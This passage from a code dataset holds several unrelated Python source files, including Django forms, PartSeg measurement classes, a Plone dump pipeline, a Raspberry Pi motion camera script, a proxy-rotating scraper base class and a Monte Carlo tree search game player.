False\n\n def clean_group(self):\n group = self.cleaned_data.get(\"group\")\n if not group:\n return\n try:\n group = Group.objects.get(slug=group)\n except Group.DoesNotExist:\n raise forms.ValidationError(_(\"The specific group does not exist.\"))\n if self.user and self.user not in group.users.all():\n raise forms.ValidationError(_(\"You must be a member of the group.\"))\n\n def save(self):\n ## Wow, what a mess. Need to stash the old set of groups\n # so that the link form's .groups attribute doesn't completely\n # overwrite it. 
But also, we need to make sure to execute\n # the old-group-set-stashing query before any data is written,\n # or else we'd lose it anyway because of lazy SQL evaluation.\n previous_groups = list(self.action.groups.all())\n link_form = ActionGroupLinkForm(self.user, instance=self.action,\n data={'groups': [self.group_obj.pk]})\n if not link_form.is_valid():\n return \n action = link_form.save()\n for previous_group in previous_groups:\n action.groups.add(previous_group)\n action.save()\n\n #if self.group_obj in link_form.cleaned_data[\"groups\"]:\n if self.mark_completed:\n return self.action.complete_for_group(self.group_obj)\n else:\n return self.action.commit_for_group(\n self.group_obj, self.cleaned_data[\"date_committed\"])\n\nclass ActionAdminForm(forms.ModelForm):\n tags = forms.ModelMultipleChoiceField(queryset=Tag.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False)\n content = forms.CharField(widget=TinyMCE(attrs={'cols': 80, 'rows': 30}))\n\n def __init__(self, *args, **kwargs):\n super(ActionAdminForm, self).__init__(*args, **kwargs)\n self.fields[\"tags\"].initial = [t.pk for t in self.instance.tags]\n\n class Meta:\n model = Action\n\n def save(self, *args, **kwargs):\n tags = self.cleaned_data[\"tags\"]\n self.instance.tags = \" \".join([t.name for t in tags]) if tags and self.instance.pk else \"\"\n return super(ActionAdminForm, self).save(*args, **kwargs)\n\nclass ActionGroupLinkForm(forms.ModelForm, GroupAssociationRequestRelatedForm):\n class Meta:\n model = Action\n fields = (\"groups\",)\n widgets = {\n \"groups\": forms.CheckboxSelectMultiple(),\n }\n\n def __init__(self, user, *args, **kwargs):\n super(ActionGroupLinkForm, self).__init__(*args, **kwargs)\n self.user = user\n self.init_groups(user)\n\n def save(self, *args, **kwargs):\n action = super(ActionGroupLinkForm, self).save(*args, **kwargs)\n self.save_groups(action)\n return action\n","sub_path":"actions/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"327657013","text":"import sys\nfrom abc import ABC\nfrom enum import Enum\nfrom typing import Any, ClassVar, Dict, ForwardRef, Iterable, List, Optional, Set, Tuple, Union\n\nimport numpy as np\nfrom local_migrator import REGISTER, class_to_str, register_class, rename_key\nfrom pydantic import Field, validator\nfrom sympy import Symbol, symbols\n\nfrom PartSegCore.algorithm_describe_base import (\n AlgorithmDescribeBase,\n AlgorithmDescribeNotFound,\n base_model_to_algorithm_property,\n)\nfrom PartSegCore.universal_const import Units\nfrom PartSegCore.utils import BaseModel\nfrom PartSegImage import Channel\nfrom PartSegImage.image import Spacing\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.PerComponent\",\n \"PartSeg.utils.analysis.measurement_base.PerComponent\",\n \"segmentation_analysis.statistics_calculation.PerComponent\",\n ]\n)\nclass PerComponent(Enum):\n \"\"\"How measurement should be calculated\"\"\"\n\n No = 1\n Yes = 2\n Mean = 3\n Per_Mask_component = 4\n\n def __str__(self):\n return self.name.replace(\"_\", \" \")\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.AreaType\",\n \"PartSeg.utils.analysis.measurement_base.AreaType\",\n \"segmentation_analysis.statistics_calculation.AreaType\",\n ]\n)\nclass AreaType(Enum):\n \"\"\"On which area type measurement should be calculated\"\"\"\n\n ROI = 1\n Mask = 2\n 
Mask_without_ROI = 3\n\n def __str__(self):\n return self.name.replace(\"_\", \" \")\n\n\ndef has_mask_components(component_and_mask_info: Iterable[Tuple[PerComponent, AreaType]]) -> bool:\n \"\"\"Check if any measurement will return value per mask component\"\"\"\n return any(\n (cmp == PerComponent.Yes and area != AreaType.ROI) or cmp == PerComponent.Per_Mask_component\n for cmp, area in component_and_mask_info\n )\n\n\ndef has_roi_components(component_and_mask_info: Iterable[Tuple[PerComponent, AreaType]]) -> bool:\n \"\"\"Check if any measurement will return value per ROI component\"\"\"\n return any((cmp == PerComponent.Yes and area == AreaType.ROI) for cmp, area in component_and_mask_info)\n\n\ndef _migrate_leaf_dict(dkt):\n from PartSegCore.analysis.measurement_calculation import MEASUREMENT_DICT\n\n new_dkt = dkt.copy()\n new_dkt[\"parameter_dict\"] = new_dkt.pop(\"dict\")\n new_dkt[\"name\"] = MEASUREMENT_DICT[new_dkt[\"name\"]].get_name()\n\n return new_dkt\n\n\n@register_class(\n version=\"0.0.2\",\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.Leaf\",\n \"PartSeg.utils.analysis.measurement_base.Leaf\",\n \"segmentation_analysis.statistics_calculation.Leaf\",\n ],\n migrations=[(\"0.0.1\", _migrate_leaf_dict), (\"0.0.2\", rename_key(\"parameter_dict\", \"parameters\"))],\n)\nclass Leaf(BaseModel):\n \"\"\"\n Class describing the calculation of a basic measurement\n \"\"\"\n\n name: str\n parameters: Any = Field(default_factory=dict)\n power: float = 1.0\n area: Optional[AreaType] = None\n per_component: Optional[PerComponent] = None\n channel: Optional[Channel] = None\n\n @validator(\"parameters\")\n def _validate_parameters(cls, v, values): # pylint: disable=no-self-use\n if not isinstance(v, dict) or \"name\" not in values:\n return v\n from PartSegCore.analysis.measurement_calculation import MEASUREMENT_DICT\n\n if values[\"name\"] not in MEASUREMENT_DICT:\n return v\n\n method = MEASUREMENT_DICT[values[\"name\"]]\n if not method.__new_style__ or not method.__argument_class__.__fields__:\n return v\n\n v = REGISTER.migrate_data(class_to_str(method.__argument_class__), {}, v)\n return method.__argument_class__(**v)\n\n @validator(\"per_component\")\n def _validate_per_component(cls, v, values): # pylint: disable=no-self-use\n if not isinstance(v, PerComponent) or \"area\" not in values or values[\"area\"] is None:\n return v\n if v == PerComponent.Per_Mask_component and values[\"area\"] != AreaType.ROI:\n raise ValueError(\"Per_Mask_component can be used only with ROI area\")\n return v\n\n def get_channel_num(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> Set[Channel]:\n \"\"\"\n Get the set of channels needed to calculate this measurement\n\n :param measurement_dict: dict with all measurement methods.\n :return: set of channel numbers\n \"\"\"\n resp = set()\n if self.channel is not None and self.channel.value != -1:\n resp.add(self.channel)\n try:\n measurement_method = measurement_dict[self.name]\n if measurement_method.__new_style__:\n fields = base_model_to_algorithm_property(measurement_method.__argument_class__)\n else:\n fields = measurement_method.get_fields()\n for el in fields:\n if isinstance(el, str):\n continue\n if el.value_type is Channel:\n if isinstance(self.parameters, dict):\n if el.name in self.parameters:\n resp.add(Channel(self.parameters[el.name]))\n elif hasattr(self.parameters, el.name):\n resp.add(getattr(self.parameters, el.name))\n except KeyError as e:\n raise AlgorithmDescribeNotFound(self.name) from e\n 
return resp\n\n def _parameters_string(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str:\n parameters = dict(self.parameters)\n if not parameters and self.channel is None:\n return \"\"\n arr = []\n if self.channel is not None and self.channel.value != -1:\n arr.append(f\"channel={self.channel}\")\n if self.name in measurement_dict:\n measurement_method = measurement_dict[self.name]\n fields_dict = measurement_method.get_fields_dict()\n arr.extend(f\"{fields_dict[k].user_name}={v}\" for k, v in parameters.items())\n else:\n arr.extend(f\"{k.replace('_', ' ')}={v}\" for k, v in parameters.items())\n return \"[\" + \", \".join(arr) + \"]\"\n\n def _plugin_info(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str:\n if self.name not in measurement_dict:\n return \"\"\n measurement_method = measurement_dict[self.name]\n if (\n hasattr(measurement_method, \"__module__\")\n and measurement_method.__module__.split(\".\", 1)[0] != \"PartSegCore\"\n ):\n if getattr(sys, \"frozen\", False):\n return f\"[{measurement_method.__module__.split('.', 2)[1]}] \"\n return f\"[{measurement_method.__module__.split('.', 1)[0]}] \"\n return \"\"\n\n def pretty_print(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str:\n \"\"\"\n Pretty print for presentation in user interface.\n\n :param measurement_dict: dict with additional information used for more detailed description\n :return: string with indentation\n \"\"\"\n\n resp = self.name\n if self.area is not None:\n resp = f\"{self.area} {resp}\"\n resp = self._plugin_info(measurement_dict) + resp\n if self.per_component is not None:\n if self.per_component == PerComponent.Yes:\n resp += \" per component \"\n elif self.per_component == PerComponent.Per_Mask_component:\n resp += \" per mask component \"\n elif self.per_component == PerComponent.Mean:\n resp += \" mean component \"\n resp += self._parameters_string(measurement_dict)\n if self.power != 1.0:\n resp += f\" to the power {self.power}\"\n return resp\n\n def __str__(self): # pragma: no cover\n return self.pretty_print({})\n\n def get_unit(self, ndim: int) -> Symbol:\n \"\"\"\n Return unit of selected measurement reflecting dimensionality.\n\n :param ndim: data dimensionality\n \"\"\"\n from PartSegCore.analysis import MEASUREMENT_DICT\n\n method = MEASUREMENT_DICT[self.name]\n if self.power != 1:\n return method.get_units(ndim) ** self.power\n return method.get_units(ndim)\n\n def is_per_component(self) -> bool:\n \"\"\"Whether the measurement returns a list of results or a single value.\"\"\"\n return self.per_component in {PerComponent.Yes, PerComponent.Per_Mask_component}\n\n def need_mask(self) -> bool:\n \"\"\"Whether this measurement needs a mask for proper calculation.\"\"\"\n return (\n self.area in {AreaType.Mask, AreaType.Mask_without_ROI}\n or self.per_component is PerComponent.Per_Mask_component\n )\n\n\ndef replace(self, **kwargs) -> Leaf:\n for key in list(kwargs.keys()):\n if key == \"power\":\n continue\n if not hasattr(self, key):\n raise ValueError(f\"Unknown parameter {key}\")\n if getattr(self, key) is not None and (key != \"parameters\" or dict(self.parameters)):\n del kwargs[key]\n\n return self.copy(update=kwargs)\n\n\nLeaf.replace_ = replace\n\nNode = ForwardRef(\"Node\")\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.Node\",\n \"PartSeg.utils.analysis.measurement_base.Node\",\n \"segmentation_analysis.statistics_calculation.Node\",\n ]\n)\nclass Node(BaseModel):\n \"\"\"\n Class describing the operation between 
two measurements\n \"\"\"\n\n left: Union[Node, Leaf]\n op: str = Field(\n description=\"Operation to perform between left and right child. Currently only division (`/`) supported\"\n )\n right: Union[Node, Leaf]\n\n def get_channel_num(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> Set[Channel]:\n return self.left.get_channel_num(measurement_dict) | self.right.get_channel_num(measurement_dict)\n\n def __str__(self): # pragma: no cover\n left_text = f\"({self.left!s})\" if isinstance(self.left, Node) else str(self.left)\n\n right_text = f\"({self.right!s})\" if isinstance(self.right, Node) else str(self.right)\n\n return left_text + self.op + right_text\n\n def pretty_print(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str: # pragma: no cover\n left_text = (\n f\"({self.left.pretty_print(measurement_dict)})\"\n if isinstance(self.left, Node)\n else self.left.pretty_print(measurement_dict)\n )\n\n right_text = (\n f\"({self.right.pretty_print(measurement_dict)})\"\n if isinstance(self.right, Node)\n else self.right.pretty_print(measurement_dict)\n )\n\n return left_text + self.op + right_text\n\n def get_unit(self, ndim) -> Symbol:\n if self.op == \"/\":\n return self.left.get_unit(ndim) / self.right.get_unit(ndim)\n raise ValueError(f\"Unknown operator '{self.op}'\")\n\n def is_per_component(self) -> bool:\n return self.left.is_per_component() or self.right.is_per_component()\n\n def need_mask(self):\n return self.left.need_mask() or self.right.need_mask()\n\n\nNode.update_forward_refs()\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.StatisticEntry\",\n \"PartSeg.utils.analysis.measurement_base.StatisticEntry\",\n \"segmentation_analysis.statistics_calculation.StatisticEntry\",\n ]\n)\nclass MeasurementEntry(BaseModel):\n \"\"\"Describes a single measurement in a measurement set\"\"\"\n\n name: str\n calculation_tree: Union[Node, Leaf]\n\n def get_unit(self, unit: Units, ndim) -> str:\n return str(self.calculation_tree.get_unit(ndim)).format(str(unit))\n\n def get_channel_num(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> Set[Channel]:\n return self.calculation_tree.get_channel_num(measurement_dict)\n\n\nclass MeasurementMethodBase(AlgorithmDescribeBase, ABC):\n \"\"\"\n This is the base class for all measurement calculation classes.\n Based on text_info[0] the measurement name will be generated; based on text_info[1] the description is generated.\n \"\"\"\n\n __argument_class__ = BaseModel\n\n text_info = \"\", \"\"\n\n need_class_method: ClassVar[List[str]] = [\n \"get_description\",\n \"is_component\",\n \"calculate_property\",\n \"get_starting_leaf\",\n \"get_units\",\n \"need_channel\",\n ]\n\n @classmethod\n def get_name(cls) -> str:\n \"\"\"Name of measurement\"\"\"\n return str(cls.get_starting_leaf().name)\n\n @classmethod\n def get_description(cls) -> str:\n \"\"\"Measurement long description\"\"\"\n return \"\" if isinstance(cls.text_info, str) else cls.text_info[1]\n\n @classmethod\n def is_component(cls) -> bool:\n \"\"\"Return whether information about components is needed\"\"\"\n return False\n\n @staticmethod\n def calculate_property(\n # image: Image,\n channel: np.ndarray,\n roi: np.ndarray,\n mask: np.ndarray,\n voxel_size: Spacing,\n result_scalar: float,\n roi_alternative: Dict[str, np.ndarray],\n roi_annotation: Dict[int, Any],\n **kwargs,\n ):\n \"\"\"\n Main function for calculating measurement\n\n :param channel: main channel selected for measurement\n :param channel_{i}: for 
channel requested using :py:meth:`get_fields`\n ``AlgorithmProperty(\"channel\", \"Channel\", 0, value_type=Channel)``\n :param area_array: array representing current area returned by :py:meth:`area_type`\n :param roi: array representing roi\n :param mask: array representing mask (upper level roi)\n :param voxel_size: size of single voxel in meters\n :param result_scalar: scalar to get proper units in result\n :param roi_alternative: dict with alternative roi representation (for plugin specific mapping)\n :param roi_annotation: dict with roi annotations (for plugin specific mapping)\n\n List incomplete.\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def get_starting_leaf(cls) -> Leaf:\n \"\"\"This leaf is put on default list\"\"\"\n return Leaf(name=cls._display_name())\n\n @classmethod\n def _display_name(cls):\n return cls.text_info if isinstance(cls.text_info, str) else cls.text_info[0]\n\n @classmethod\n def get_units(cls, ndim) -> symbols:\n \"\"\"Return units for measurement. They are shown to user\"\"\"\n raise NotImplementedError\n\n @classmethod\n def need_channel(cls):\n \"\"\"if need image data\"\"\"\n return False\n\n @staticmethod\n def area_type(area: AreaType):\n \"\"\"Map chosen area type to proper area type. Allow to correct Area type.\"\"\"\n return area\n\n @staticmethod\n def need_full_data():\n return False\n","sub_path":"package/PartSegCore/analysis/measurement_base.py","file_name":"measurement_base.py","file_ext":"py","file_size_in_byte":14707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"536303137","text":"import os\nimport simplejson as json\n\nfrom zope.component import queryMultiAdapter\nfrom zope.interface import classProvides, implements\n\nfrom collective.transmogrifier.interfaces import ISection, ISectionBlueprint\n\nfrom oops.staticdump.utilities import renew_folder\nfrom oops.staticdump.interfaces import IDumper\n\n\ndef destination(transmogrifier):\n return transmogrifier['transmogrifier'].get('destination', '/tmp/dump')\n\nclass TreeBuilderSection(object):\n \"\"\" Create a tree on file system equivalent to plone site.\n Filter out not specified content types\n \"\"\"\n\n classProvides(ISectionBlueprint)\n implements(ISection)\n\n def __init__(self, transmogrifier, name, options, previous):\n self.previous = previous\n\n self.destination = destination(transmogrifier)\n renew_folder(self.destination)\n\n types = options.get('types', [])\n self.types = [t for t in types.splitlines() if t!='']\n\n def __iter__(self):\n for item in self.previous:\n if item.get('_type', '') in self.types:\n path = item.get('_path')\n final_destination = os.path.join(self.destination, path)\n renew_folder(final_destination)\n\n yield item\n\n\nclass DumperSection(object):\n \"\"\" For each entry call IDumper adapter \"\"\"\n\n classProvides(ISectionBlueprint)\n implements(ISection)\n\n def __init__(self, transmogrifier, name, options, previous):\n self.previous = previous\n self.transmogrifier = transmogrifier\n self.transmogrifier.manifests = {}\n self.transmogrifier.folders = []\n self.transmogrifier.others = []\n self.transmogrifier.voices = []\n self.transmogrifier.files = []\n self.transmogrifier.anchored_pages = []\n self.portal = transmogrifier.context\n\n types = self.transmogrifier['treebuilder'].get('types', [])\n self.types = [t for t in types.splitlines() if t!='']\n\n\n def manifests(self):\n \"\"\" save the manifests file \"\"\"\n file_path = 
self.transmogrifier['transmogrifier'].get('destination', '/tmp/dump')\n f = open(os.path.join(file_path, 'manifest-versions.json'), 'w')\n f.write(json.dumps(self.transmogrifier.manifests)) # to check format\n f.close()\n\n def __iter__(self):\n for item in self.previous:\n #if item.get('_type', '') in self.types:\n path = item.get('_path')\n obj = self.portal.restrictedTraverse(path)\n dumper = queryMultiAdapter((obj, self.transmogrifier), IDumper)\n if dumper is not None:\n dumper.dump()\n\n yield item\n self.manifests()\n","sub_path":"packages/oops.staticdump/branches/book-dumpers-removal-r215/oops/staticdump/sections.py","file_name":"sections.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"419282862","text":"\nimport picamOriginal\nimport picamera\nimport sendNotification2\nimport glob\nimport os\nfrom datetime import datetime\n\nmotState = False\npath = '/home/pi/Desktop/cookie/images/'\n\ndef captureImage(currentTime,picPath):\n picName = currentTime.strftime('%Y. %m. %d-%H%M%S')+'.jpg'\n with picamera.PiCamera() as camera:\n camera.resolution = (1280,720)\n camera.capture(picPath+picName)\n print('Taken pic')\n\ndef getTime():\n currentTime=datetime.now()\n return currentTime\n\npicNumber=0\n\nfiles = glob.glob('/home/pi/Desktop/cookie/images/*')\n\nfor f in files:\n os.remove(f)\n\nwhile True:\n motState = picamOriginal.mtion()\n print(motState)\n if motState:\n currentTime = getTime()\n captureImage(currentTime,path)\n picNumber+=1\n if (picNumber == 5):\n sendNotification2.sendEmail()\n picNumber=0\n","sub_path":"useMotion.py","file_name":"useMotion.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"211553950","text":"def pronksikarva_summa(taisarvud):\n ''' (list) -> int\n Returns the sum of the values 1, 2 and 5 in the list.\n >>> pronksikarva_summa([1, 20, 20, 5, 50, 2, 2, 1])\n 11\n '''\n summa = 0\n \n for mynt in taisarvud:\n if mynt == 1 or mynt == 2 or mynt == 5:\n summa = summa + mynt\n return summa\n\nfailinimi = input('Enter a filename: ')\n\nfail = open(failinimi, encoding=\"UTF-8\")\ntaisarvud = []\n \nfor rida in fail:\n taisarvud.append(int(rida)) \nfail.close()\n\nprint(pronksikarva_summa(taisarvud))","sub_path":"yl6.4b.py","file_name":"yl6.4b.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"249988040","text":"import json\n\n\ndef JsonParser(file):\n pdata = dict()\n with open(file, mode=\"r\", encoding=\"utf-8\") as inf:\n pdata = json.load(inf)\n return pdata\n\n\ndef test():\n test_data = JsonParser(\"jsonData.json\")\n pdit = {}\n for pd in test_data:\n print(pd[\"batters\"][\"batter\"])\n for item in pd[\"batters\"][\"batter\"]:\n print(item[\"id\"])\n\nif __name__ == '__main__':\n test()\n","sub_path":"Basics/jsonProcess.py","file_name":"jsonProcess.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"392585349","text":"import requests\nimport threading\nimport time\nimport traceback\nimport re,os\n\n'''\nBase spider class:\n1. Updating and using the IP pool\n2. Initializing the configuration\n'''\nclass spiderbase:\n _DIRS = ['data','conf','bin','lib','log']\n def __init__(self):\n for dir in self._DIRS:\n if not os.path.exists(f'./{dir}'):\n os.makedirs(f'./{dir}')\n # proxy URL\n self.proxy_url = ''\n # limit on the interval between proxy extractions\n self.time_line = 
time.time()\n self.time_limit = 1\n # self.timeLimitLock = threading.Lock()\n self.ip_pool = []\n self.ipPoolLock = threading.Lock()\n self.ipPoolUpdateLock = threading.Lock()\n self.headers={\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36'\n }\n self.userAgentPool = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36']\n self.import_setting()\n '''\n Fetch the proxy IP list.\n Returned as a list like ['IP:port'].\n Needs to be overridden to match each proxy provider's API response.\n '''\n @staticmethod\n def getProxyList(proxy_url) -> list:\n try:\n html = requests.get(url=proxy_url)\n data = html.json()\n except:\n traceback.print_exc()\n return []\n return data\n\n '''Import the configuration file'''\n def import_setting(self) -> bool:\n try:\n set = open('./conf/init.setting','r')\n except:\n print('Initialization config file ./conf/init.setting not found. Using default parameters.')\n return False\n HD = re.compile('([\\s\\S]+?)')\n UA = re.compile('([\\s\\S]+?)')\n PURL = re.compile('([\\s\\S]+?)')\n setting_text = set.read()\n header_text = HD.search(setting_text).group(1).strip(' \\n')\n userAgentText = UA.search(setting_text).group(1).strip(' \\n')\n proxyUrlText = PURL.search(setting_text).group(1).strip(' \\n')\n if header_text:\n header_list = header_text.split('\\n')\n for header in header_list:\n htmp = header.strip(' \\n')\n if htmp and ':' in htmp:\n htmp_list = htmp.split(':')\n header_name = htmp_list[0].strip(' ')\n header_value = htmp_list[1].strip(' ')\n self.headers[header_name]=header_value\n if userAgentText:\n userAgentList = userAgentText.split('\\n')\n for user_agent in userAgentList:\n utmp = user_agent.strip(' \\n')\n if utmp not in self.userAgentPool:\n self.userAgentPool.append(utmp)\n if proxyUrlText:\n self.proxy_url = proxyUrlText\n\n return True\n\n\n def ipPoolUpdatePermit(self) -> bool:\n while(time.time()-self.time_line < self.time_limit):\n # assumption: busy-wait until the extraction interval has elapsed\n pass\n self.time_line = time.time()\n return True\n\n '''Update the IP pool'''\n def ipPoolUpdate(self) -> bool:\n self.ipPoolUpdatePermit()\n ipPortList = self.getProxyList(self.proxy_url)\n if not ipPortList:\n return False\n else:\n self.ipPoolLock.acquire()\n for ip_port in ipPortList:\n self.ip_pool.append(ip_port)\n self.ipPoolLock.release()\n return True\n\n\n '''Pop an IP:port from the proxy pool'''\n def getIpPort(self) -> str:\n self.ipPoolUpdateLock.acquire()\n if not self.ip_pool:\n if_update = self.ipPoolUpdate()\n if not if_update:\n print('Failed to get an IP: error while updating the IP pool')\n self.ipPoolUpdateLock.release()\n return ''\n self.ipPoolLock.acquire()\n ip_port = self.ip_pool.pop()\n self.ipPoolLock.release()\n else:\n self.ipPoolLock.acquire()\n ip_port = self.ip_pool.pop()\n self.ipPoolLock.release()\n self.ipPoolUpdateLock.release()\n return ip_port\n\n '''Get a proxy URL; the type parameter is http/https, default https'''\n def getProxyUrl(self,type='https') -> str:\n ip_port = self.getIpPort()\n return f'{type}://{ip_port}'\n\nif __name__ =='__main__':\n spider = spiderbase()","sub_path":"spiderbase.py","file_name":"spiderbase.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"322623660","text":"from Player import Player\r\n\r\nimport operator\r\nfrom operator import attrgetter\r\nimport numpy as np\r\nimport time\r\nimport random\r\nfrom statistics import mean\r\nimport math\r\n\r\nfrom deap import algorithms\r\nfrom deap import base\r\nfrom deap import creator\r\nfrom deap import tools\r\nfrom deap import gp\r\n\r\n\r\n\r\nclass MCTS_TREE_ES_Player(Player):\r\n \r\n # Player 1 selects the optimal UCT move \r\n # Player 2 selects the worst move from Player 1's position\r\n \r\n def __init__(self, 
iterations = 500, timeLimit = 3, isTimeLimited = False, c_param = 9, logs=False):\r\n super().__init__()\r\n self.iterations = iterations\r\n self.timeLimit = timeLimit\r\n self.isTimeLimited = isTimeLimited\r\n self.c_param = c_param\r\n self.name = 'T_ES_MCTS'\r\n self.fullName = f'MCTS (Time Limit = {self.timeLimit})' if self.isTimeLimited else f'MCTS (Iterations = {self.iterations})'\r\n self.family = \"MCTS\"\r\n self.logs = logs\r\n self.hasGPTree = False\r\n self.GPTree = None\r\n if self.logs:\r\n self.cols = ['Name','Simulations','Turn','TimeTaken']\r\n self.file = self.CreateFile()\r\n \r\n \r\n def ClonePlayer(self):\r\n Clone = MCTS_TREE_ES_Player(iterations=self.iterations, timeLimit=self.timeLimit, isTimeLimited = self.isTimeLimited, \r\n c_param=self.c_param, logs=self.logs)\r\n return Clone\r\n \r\n \r\n def chooseAction(self, state):\r\n \"\"\"\r\n Choose actions using UCT function\r\n \"\"\"\r\n return self.MCTS_Search(state, self.iterations, self.timeLimit, self.isTimeLimited)\r\n \r\n \r\n def MCTS_Search(self, root_state, iterations, timeLimit, isTimeLimited):\r\n \"\"\"\r\n Conduct a UCT search for the given number of iterations starting from root_state.\r\n Return the best move from the root state.\r\n Assumes 2 alternating players (player 1 starts), with game results in the range [0, 1]\r\n \"\"\"\r\n # Player 1 = 1, Player 2 = 2 (Player 2 wants the game to be a loss)\r\n playerSymbol = root_state.playerSymbol\r\n \r\n # create the root node\r\n root_node = Node(state = root_state)\r\n #startTime = time.time()\r\n \r\n if self.isTimeLimited:\r\n self.MCTS_TimeLimit(root_node, root_state)\r\n else:\r\n self.MCTS_IterationLimit(root_node, root_state)\r\n \r\n # return the node with the highest number of wins from the view of the current player\r\n if playerSymbol == 1:\r\n bestMove = sorted(root_node.child, key = lambda c: c.Q)[-1].Move\r\n else:\r\n bestMove = sorted(root_node.child, key = lambda c: c.Q)[0].Move\r\n \r\n \r\n return bestMove.move\r\n \r\n \r\n \r\n def MCTS_IterationLimit(self, root_node, root_state):\r\n \r\n startTime = time.time()\r\n \r\n for i in range(self.iterations):\r\n \r\n node = root_node\r\n state = root_state.CloneState()\r\n \r\n # Select\r\n while node.untried_moves == [] and node.child != []: # node is fully expanded\r\n if not self.hasGPTree:\r\n # GP search\r\n if root_state.Turn >= 1:\r\n # get the GPTree of this turn\r\n self.GPTree = GP_Search(node, self.c_param, self.hasGPTree, self.GPTree)\r\n self.hasGPTree = True\r\n node = node.Search(self.c_param, self.hasGPTree, self.GPTree)\r\n state.move(node.Move.move)\r\n \r\n # Expand\r\n if node.untried_moves != [] and (not state.isGameOver): # if we can expand, i.e. 
state/node is non-terminal\r\n move_random = random.choice(node.untried_moves)\r\n state.move(move_random.move)\r\n node = node.AddChild(move = move_random, state = state, isGameOver = state.isGameOver)\r\n \r\n # Rollout\r\n # play random moves until the game reaches a terminal state\r\n # shuffle deck\r\n state.shuffle()\r\n while not state.isGameOver:\r\n m = state.getRandomMove()\r\n state.move(m.move)\r\n \r\n # Backpropogate\r\n result = state.checkWinner()\r\n while node != None: # backpropogate from the expected node and work back until reaches root_node\r\n node.UpdateNode(result, self.c_param)\r\n node = node.parent\r\n # latest time\r\n endTime = time.time()\r\n \r\n print(f'(MCTS_TREE_ES) TimeTaken: {round(endTime - startTime,3)} secs, Time:{time.strftime(\"%H:%M:%S\", time.localtime())}')\r\n \r\n # reset GP info\r\n self.GPTree = None\r\n self.hasGPTree = False\r\n \r\n # append info to csv\r\n if self.logs:\r\n data = {'Name': self.name,'Simulations':self.iterations,'Turn':int((root_state.Turn+1)/2), 'TimeTaken':endTime - startTime}\r\n self.UpdateFile(data)\r\n \r\n \r\n \r\n \r\n \r\n##############################################################################\r\n##############################################################################\r\n##############################################################################\r\n\r\n\r\n#C_PARAM = 2\r\n\r\nclass Node:\r\n \"\"\"\r\n The Search Tree is built of Nodes\r\n A node in the search tree\r\n \"\"\"\r\n \r\n def __init__(self, Move = None, parent = None, state = None, isGameOver = False):\r\n self.Move = Move # the move that got us to this node - \"None\" for the root\r\n self.parent = parent # parent node of this node - \"None\" for the root node\r\n self.child = [] # list of child nodes\r\n self.state = state\r\n self.untried_moves = state.availableMoves()\r\n self.playerSymbol = state.playerSymbol\r\n # keep track of visits/wins/losses\r\n self.visits = 0\r\n self.wins = 0\r\n self.losses = 0\r\n self.draws = 0\r\n self.Q = 0\r\n # UCT score\r\n self.UCT_high = 0\r\n self.UCT_low = 0\r\n # GP search decision\r\n self.GP_Tree = None\r\n \r\n \r\n def __repr__(self):\r\n visits = 1 if self.visits == 0 else self.visits\r\n String = \"[\"\r\n String += f'Move:{str(self.Move.move)}, Wins:{round(self.wins,1)},'\r\n String += f' Losses:{self.losses}, Draws:{self.draws}, Q:{round(self.Q,3)},'\r\n String += f' Wins/Visits:{round(self.wins,1)}/{self.visits} ({round(self.wins/visits,3)}),'\r\n String += f' UCT_high:{round(self.UCT_high, 3)}, UCT_low:{round(self.UCT_low, 3)},'\r\n String += f' Remaining Moves:{len(self.untried_moves)}'\r\n String += \"]\"\r\n \r\n return String\r\n \r\n def AddChild(self, move, state, isGameOver):\r\n \"\"\"\r\n Add new child node for this move remove m from list of untried_moves.\r\n Return the added child node.\r\n \"\"\"\r\n node = Node(Move = move, state = state, isGameOver = isGameOver, parent = self)\r\n self.untried_moves.remove(move) # this move is now not available\r\n self.child.append(node)\r\n return node\r\n \r\n \r\n def UpdateNode(self, result, c_param):\r\n \"\"\"\r\n Update result and number of visits of node\r\n \"\"\"\r\n self.visits += 1\r\n self.wins += (result > 0)\r\n self.losses += (result < 0)\r\n self.draws += (result == 0)\r\n self.Q = self.Q + (result - self.Q)/self.visits\r\n \r\n \r\n def SwitchNode(self, move, state):\r\n \"\"\"\r\n Switch node to new state\r\n \"\"\"\r\n # if node has children\r\n for i in self.child:\r\n if i.Move == move:\r\n return i\r\n \r\n # 
